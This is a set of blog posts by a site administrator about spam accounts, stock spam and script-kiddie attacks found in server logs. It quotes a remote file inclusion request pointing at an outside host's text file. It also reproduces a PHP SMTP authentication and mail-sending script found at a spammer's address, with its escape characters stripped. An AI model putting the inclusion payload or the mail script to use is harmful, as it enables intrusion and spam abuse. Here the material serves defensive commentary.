It started out harmless enough: A registered user tried to submit a spam post. What I do in such a case is block the user's account. It had a yahoo.com address and the user had actually gone through the trouble of uploading a user photo - which featured the photo of a doctor and the words "online pharmacy". Nice one.

A while later, another registered user tried to edit his user profile and stuff it with the usual pharmacy spam keywords. Good thing we run user profiles through the spam filter ...

That "new" user, however, came from the same IP address as our previous guest. And that's when I noticed a whole bunch of new accounts, all using email addresses with the domain name kinglibrary.net. Well, guess what happened to those accounts. And into the blacklist with that domain name. read more

I've got the impression that over the last couple of days, the amount of webspam is slightly down, while the number of script kiddie attacks is up sharply. So I had a closer look at our logs. I noticed a whole bunch of the usual inclusion attempts like

/index.php?kunden=http://amyru.h18.ru/images/cs.txt?

Sorry, guys - our index.php doesn't even look for a "kunden" parameter (and even if it did, it wouldn't fall for that old trick).

But what I found more interesting is the referrer that came with these attempts:

http://www.altavista.com/web/results?itag=ody&kgs=1&kls=0&q=search&stq=0

Altavista? Who uses that any more? read more

Dear Spammer, don't you think it's somewhat morbid to (try to) spam for Anna Nicole Smith Topless? The poor woman's been dead for eight months now. Unless, of course, you're trying to advertise things related to necrophilia (and, no, I didn't check out the spamvertized site ...). read more

Looking through the Bad Behavior logs, I've noticed a bunch of rejected trackback spam attempts from 64.71.177.84, belonging to Hurricane Electric (Not the first time I've seen that name, btw. They seem to be popular with the spammers, for whatever reason ...).

Well, I decided to type that IP address into my browser and got this piece of PHP code:

; $from_mail = "phpauth@yandex.ru"; $to_mail = "grigory@mail.astrakhan.ru"; $message = "Subject: testnFrom: $from_mailnTo: $to_mailntest"; $host = "smtp.yandex.ru"; $port = 25; $errno = 30; $errstr = 1; $timeout = 1; $handle = fsockopen($host, $port, $errno, $errstr, $timeout); fputs($handle, "EHLO $hostrn"); echo fread($handle, 4096) . "

"; fputs($handle, "AUTH LOGINrn"); echo fread($handle, 4096) . "

"; fputs($handle, base64_encode($user) . "rn"); echo fread($handle, 4096) . "

"; fputs($handle, base64_encode($pass) . "rn"); echo fread($handle, 4096) . "

"; fputs($handle, "MAIL FROM:<$from_mail>rn"); echo fread($handle, 4096) . "

"; fputs($handle, "RCPT TO:<$to_mail>rn"); echo fread($handle, 4096) . "

"; fputs($handle, "DATArn"); echo fread($handle, 4096) . "

"; fputs($handle, "$messagern.rn"); echo fread($handle, 4096) . "

"; fputs($handle, "QUITrn"); echo fread($handle, 4096) . "

"; fclose($handle); ?>

Email stock spam has reached a new low of (un-)readability. I found this in my inbox this morning:

Subject: +[!]:.:!*)+(*)[++  (-!-.)!  )!)(*-(- !

Sy+m b.oool F)D.E)G
Price 0.04
Ta.rg:et 0.12

... and that was the entire content of the email. No attachments, no HTML.

I have a hard time believing that this would work. Which sane person would care to decipher this and then actually go and buy that stock? Surely the people stupid enough to fall for that sort of scam are too stupid to understand that email in the first place. I mean, the early stock spams at least tried to look like "insider tips". But this?

My current theory is that this sort of stock spam isn't really targetted at normal people any more. There is probably some sort of ecosystem of freeloaders in place now. I.e. people who know that this is a scam to drive up the prices but buy the stock nonetheless, accepting that they get a smaller piece of the cake than the actual spammer.

Fortunately, neither stock spam nor this sort of obfuscation are common in webspam.